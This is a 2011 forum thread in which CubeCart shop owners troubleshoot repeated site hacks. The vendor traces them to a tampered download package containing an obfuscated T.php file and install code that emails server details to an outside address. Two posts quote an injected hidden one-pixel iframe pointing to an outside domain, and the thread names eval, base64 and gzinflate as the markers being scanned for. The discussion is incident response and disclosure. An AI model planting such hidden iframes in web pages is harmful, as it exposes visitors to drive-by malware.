Guest Zomnut Posted February 5, 2011 Share Posted February 5, 2011 Website hacked again last night. Looking through the access_logs uncovered something very unsettling. Al, sending you a PM for security reasons. Quote Link to comment Share on other sites More sharing options...
Guest Posted February 6, 2011 Share Posted February 6, 2011 Website hacked again last night. Looking through the access_logs uncovered something very unsettling. Al, sending you a PM for security reasons. I bet you have a bot on your system tats gleaming your ftp passwords and usernames. change them from a different machine and you will find they cant get access - which means chnaging your usernames and hunting down the virus. and not storing your usernames and p/ws for FTprograms on your machine til you have found it. Quote Link to comment Share on other sites More sharing options...
Dodgebill Posted February 6, 2011 Share Posted February 6, 2011 Website hacked again last night. Looking through the access_logs uncovered something very unsettling. Al, sending you a PM for security reasons. I bet you have a bot on your system tats gleaming your ftp passwords and usernames. change them from a different machine and you will find they cant get access - which means chnaging your usernames and hunting down the virus. and not storing your usernames and p/ws for FTprograms on your machine til you have found it. I have looked at my logs and can't find any FTP access to my site when it got hacked. I changed my password (from another machine) and still got hacked again. The only FTP access to my site came from my IP and I have kept track if when I log in and it's all right there with nothing else going on. It's just not adding up. Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted February 6, 2011 Share Posted February 6, 2011 Website hacked again last night. Looking through the access_logs uncovered something very unsettling. Al, sending you a PM for security reasons. I bet you have a bot on your system tats gleaming your ftp passwords and usernames. change them from a different machine and you will find they cant get access - which means chnaging your usernames and hunting down the virus. and not storing your usernames and p/ws for FTprograms on your machine til you have found it. I have looked at my logs and can't find any FTP access to my site when it got hacked. I changed my password (from another machine) and still got hacked again. The only FTP access to my site came from my IP and I have kept track if when I log in and it's all right there with nothing else going on. It's just not adding up. As I have said several times before - there are any number of ways that this type of problem can be caused, so focusing on only one is not going to solve your problem ! Unless it is your own dedicated or VPS server then you will not be looking at the server access log unless your host has provided these which is extremely unlikely. Also just because you have used another PC, what is to say that this one isnt infected with the same problem (if this is indeed the method they are getting in - it is only one possibility !) Quote Link to comment Share on other sites More sharing options...
Robsta Posted February 6, 2011 Share Posted February 6, 2011 If it's so predictable that your files are getting altered, can't your hosting company monitor your account for access? Quote Link to comment Share on other sites More sharing options...
Dodgebill Posted February 6, 2011 Share Posted February 6, 2011 If it's so predictable that your files are getting altered, can't your hosting company monitor your account for access? It's not that predictable. I went 4 days this week without a hack and then got hit 3 times yesterday.... They found a way around all the measures used to stop it and got back in I guess. Does anyone know where the kids get their info on hacking? Might help us figure out how they are doing it. I did notice that files I had deleted were restored. The dates/times all matched the other files. Almost like the host did a backup or something. Might explain why it's coming back so often Quote Link to comment Share on other sites More sharing options...
Robsta Posted February 6, 2011 Share Posted February 6, 2011 I meant predictable in that you will be hacked. This can't be CubeCart. You need to get your hosting company more involved, otherwise you will go round in circles. Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted February 6, 2011 Share Posted February 6, 2011 I meant predictable in that you will be hacked. This can't be CubeCart. You need to get your hosting company more involved, otherwise you will go round in circles. For those of you still getting this problem - getting your host involved to diagnose the source of your specific problem and help you plug the security issue is the ONLY way. If they are unwilling or unable - then move to a different host ! As much as I and others would like to help further, if you have followed the various advice already given, then nobody on here is going to be able to help any further without server level access or very specific proof that CubeCart is the cause (which I personally believe to be a very small possibility) Ian Quote Link to comment Share on other sites More sharing options...
Guest Zomnut Posted February 6, 2011 Share Posted February 6, 2011 To be clear, but attempting to be responsible in the public sphere - in investigating the break-in on my website I found a security hole in CubeCart. In the interest of not having the hole get blown open so anyone reading this forum can freely exploit ANYONE's CubeCart installation, I have reported the exploit to Al so the CubeCart team can fix it and stay in control of the situation. Quote Link to comment Share on other sites More sharing options...
Dodgebill Posted February 6, 2011 Share Posted February 6, 2011 To be clear, but attempting to be responsible in the public sphere - in investigating the break-in on my website I found a security hole in CubeCart. In the interest of not having the hole get blown open so anyone reading this forum can freely exploit ANYONE's CubeCart installation, I have reported the exploit to Al so the CubeCart team can fix it and stay in control of the situation. I hope there is a speedy resolution to this issue now that the cause has been found. Thanks for all your help Zomnut I am very put off by the lack of consideration the so called experts gave to this issue. Not very professional in my opinion. I have come to expect better from this group. Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted February 6, 2011 Share Posted February 6, 2011 To be clear, but attempting to be responsible in the public sphere - in investigating the break-in on my website I found a security hole in CubeCart. In the interest of not having the hole get blown open so anyone reading this forum can freely exploit ANYONE's CubeCart installation, I have reported the exploit to Al so the CubeCart team can fix it and stay in control of the situation. I hope there is a speedy resolution to this issue now that the cause has been found. Thanks for all your help Zomnut I am very put off by the lack of consideration the so called experts gave to this issue. Not very professional in my opinion. I have come to expect better from this group. Well as nobody else has seen what this "cause of the exploit" is it is extremely difficult to anyone else to comment. Even if it is an exploit in CubeCart then it isnt necessarily the same reason that other people are having this problem. ANY website (not just CubeCart) can be open to this type of problem, so lets just wait and see what Al has to say tomorrow. Still strange that of the tens if not hundreds of thousands of CubeCart 3 sites that are out there, there have been relatively few affected ! Also, apart from Al who owns CubeCart, everyone else on these forums offers their help and advice completely free and in their own time and without charge. To say that people have been unprofessional and that they have given a lack of consideration to this problem is rude and insulting ! The alternative to getting free support on these forums from professionals and other experienced end users, is for you to pay for CubeCart support either directly from CubeCart themselves or from one of the other companies that offer this service. Ian Quote Link to comment Share on other sites More sharing options...
Guest Shipz Posted February 6, 2011 Share Posted February 6, 2011 Hi guys. I have been following this thread over the last few days as i have been a victim of this too. I am no expert in such matters and look to these forums for guidance and advice as i guess many people do. There are probably a larger number people viewing than contributing to this thread or even people are unaware that their site is experiencing problems. The advice posted as been very welcome and appreciated. I guess most people me included never expected to be so tied up in website / server running. Initially i got the code placed into the index.php and the jslibrary.js files. I resorted to restoring to a previously saved back up. Changed passwords and permissions. Contacted my host who tells me they use suPhp on their servers( I use Just Host for the record). I have changed the permissions on the js files to 0444. However my anti virus picked up a threat a couple of days ago called JS:Downloader - ALQ[Trj] . I have tried doing a search to try and find what this was but i couldn't find much on it. However looking at the name of the thing it sort of points to it being something that may well be associated with this problem. Or am i totally wrong? The thing is it wasnt picked up until a few days ago and i do a scan every day so if it had been there when i first experienced this problem then i would have expected it to have been found earlier. After finding and quarantining it i did a full virus and malware scan and found nothng else. Yesterday i checked my site and i found that it had again been attacked. This time i was getting a parse error screen on the index.php file. I went through the file and found the following line of code <iframe src="http://free-counter.biz.ly" width=1 height=1 frameborder-0></iframe> I removed this line and we were back in business. I have no idea how this was added as i thought i had done all the steps mentioned in this thread. Not sure this will help anybody, but just thought i would add my experience with this problem to date. I look forward to following this thread and hope a definitive resolution is found and guys be nice to one another, it's frustrating i know, but without the help on these forums i wouldn't know where to start. Quote Link to comment Share on other sites More sharing options...
Guest valtam Posted February 7, 2011 Share Posted February 7, 2011 As a precaution with the best interests of my client at the fore, I have contacted our Host and asked them to move us to another machine. They can no longer afford to risk using the same machine, or the same software as people here can't seem to agree on what is the root cause. I will no longer use Cubecart as a precaution until it is crystal clear as to what is going on here. btw, my index.php file was changed to <iframe src="http://free-counter.biz.ly" width=1 height=1 frameborder-0></iframe> on 5/2/11 at around 11pm Sydney time as well. So my initial fears are realised, they are simply sitting on this and exploiting it at will. Bastards. What would happen if we changed all the permissions of everything to 444? Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted February 7, 2011 Share Posted February 7, 2011 CHMOD to 0444 for everything should be ok so long as the image folders and cache are writable. It depends on how your hosting is configured. Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted February 7, 2011 Share Posted February 7, 2011 Zomnut found something in the access logs which is suspicious. This file has been found in the 3.0.20 package hosted on our server. We are looking into how and why. It could be that the download file was hacked on our server somehow. Our server is scanned daily for exploits by McAfee Secure and has a PCI certification so in theory it is very secure. Please can you all check for the existence of the following file: /images/random/chars/T.php If it exists please let me know and be sure to delete it. Quote Link to comment Share on other sites More sharing options...
Guest Shipz Posted February 7, 2011 Share Posted February 7, 2011 I've just checked and i do have a T.php file in the location you reported. However i have just checked my Cubecart unzipped folder i have here on my local pc and noticed that file was in there also. This unzipped version is a copy of the original files which i have been using to work out where code as been changed in the hacked ones. If it shouldn't be there how come it is in the original files supplied? What is it doing? Probably daft questions, but like i said earlier i am no expert on such things. Valtam sorry to hear you had the same problem as me, just wondering if anyone else experienced the same thing around the same time? Thanks Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted February 7, 2011 Share Posted February 7, 2011 I think that the zip folder hosted on our server somehow got hacked. It has been replaced since 9:25 this morning with a cleaned one. It has been scanned for any instances of bad javascript or PHP 'eval' functions and it is fine now. Quote Link to comment Share on other sites More sharing options...
Guest Shipz Posted February 7, 2011 Share Posted February 7, 2011 Hey Al So the T.php file is definitely not part of the CC code? and i can delete it? The zip folder i unzipped was the folder i downloaded when i first started getting to grips with CC which would have been back in November last year. If that's the case then that file must have been there a long time. Any ideas as to what that file was doing? Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted February 7, 2011 Share Posted February 7, 2011 Please delete the file. It should not be in the package and plays no part in CubeCart at all. The code is obfuscated meaning it can't be read easily. I haven't obfuscated it yet but its fairly sizeable. Quote Link to comment Share on other sites More sharing options...
Dodgebill Posted February 7, 2011 Share Posted February 7, 2011 Please delete the file. It should not be in the package and plays no part in CubeCart at all. The code is obfuscated meaning it can't be read easily. I haven't obfuscated it yet but its fairly sizeable. I downloaded my copy of CC3.0.20 back in September and it has the file. This has been going on for a while I guess..... It is not in the download package of 3.0.18 I had and one of my stores that did get hacked was using that. That site does not have the T.php file on it and never has but has been hacked a lot. Quote Link to comment Share on other sites More sharing options...
Dodgebill Posted February 7, 2011 Share Posted February 7, 2011 To be clear, but attempting to be responsible in the public sphere - in investigating the break-in on my website I found a security hole in CubeCart. In the interest of not having the hole get blown open so anyone reading this forum can freely exploit ANYONE's CubeCart installation, I have reported the exploit to Al so the CubeCart team can fix it and stay in control of the situation. I hope there is a speedy resolution to this issue now that the cause has been found. Thanks for all your help Zomnut I am very put off by the lack of consideration the so called experts gave to this issue. Not very professional in my opinion. I have come to expect better from this group. Well as nobody else has seen what this "cause of the exploit" is it is extremely difficult to anyone else to comment. Even if it is an exploit in CubeCart then it isnt necessarily the same reason that other people are having this problem. ANY website (not just CubeCart) can be open to this type of problem, so lets just wait and see what Al has to say tomorrow. Still strange that of the tens if not hundreds of thousands of CubeCart 3 sites that are out there, there have been relatively few affected ! Also, apart from Al who owns CubeCart, everyone else on these forums offers their help and advice completely free and in their own time and without charge. To say that people have been unprofessional and that they have given a lack of consideration to this problem is rude and insulting ! The alternative to getting free support on these forums from professionals and other experienced end users, is for you to pay for CubeCart support either directly from CubeCart themselves or from one of the other companies that offer this service. Ian Ian, Please reread the post I made and then a few of your own and tell me I was wrong in any way. I know 99.9999% of the users are unpaid. We all know that. Cubecart is the one place anyone can go and ask for help and the 'cool kids' don't beat you up for it. At least it used to be.... Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted February 7, 2011 Share Posted February 7, 2011 Please delete the file. It should not be in the package and plays no part in CubeCart at all. The code is obfuscated meaning it can't be read easily. I haven't obfuscated it yet but its fairly sizeable. I downloaded my copy of CC3.0.20 back in September and it has the file. This has been going on for a while I guess..... It is not in the download package of 3.0.18 I had and one of my stores that did get hacked was using that. That site does not have the T.php file on it and never has but has been hacked a lot. The version of 3.0.20 that I have and have used for clients was downloaded 16th Sept 2010 and doesnt have that file. No CubeCart V3 sites on our servers have been hacked. I have been told of two other websites (not CubeCart but html / php / js) that have had the same code injection problem so while this may be a possible solution for some, there are still other problems causing this. the trojan that was previously mentioned is also one possible way Ian Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted February 7, 2011 Share Posted February 7, 2011 For now the only recommendation we can have is to delete the T.php file if it exists. There are no other known security holes. Our helpdesk software that stores the v3.0.20 files has been updated recently so we expect any exploits have been patched. We know that all server software is up to date and configured to McAfees recommendations so we can't do any more than that. I'm really very sorry you have experienced this issue. Quote Link to comment Share on other sites More sharing options...
bsmither Posted February 7, 2011 Share Posted February 7, 2011 The version of 3.0.20 that I have and have used for clients was downloaded 16th Sept 2010 and doesn't have that file. Versions 17, 18, and 19 were downloaded late October 2010 and have altered files (yes, plural). Honest disclaimer: when I saw and decoded the anomaly in /install/index.php, I just thought Devellion was being a (not very complimentary word). The anomaly determines your server host and emails it to a gmail account. I discovered this Nov 12, 2010. I am so sorry I didn't call Devellion out on this. The other anomalies found in the zip files downloaded October 27, 2010 are: /language/nl/lang.inc.php and /includes/boxes/siteDocs.php. Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted February 7, 2011 Share Posted February 7, 2011 Ok so it seems that the package on our server has been interfered with. I have temporarily take it offline pending investigation. A number of files have had code added to them. I am in the process now of scanning for instances of 'eval', 'base_64' and 'gzinflate'. I'll release a full report ASAP and put the 3.0.20 package up again. We will then rerelease it with an MD5 signature so that it can be verified prior to future installations. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.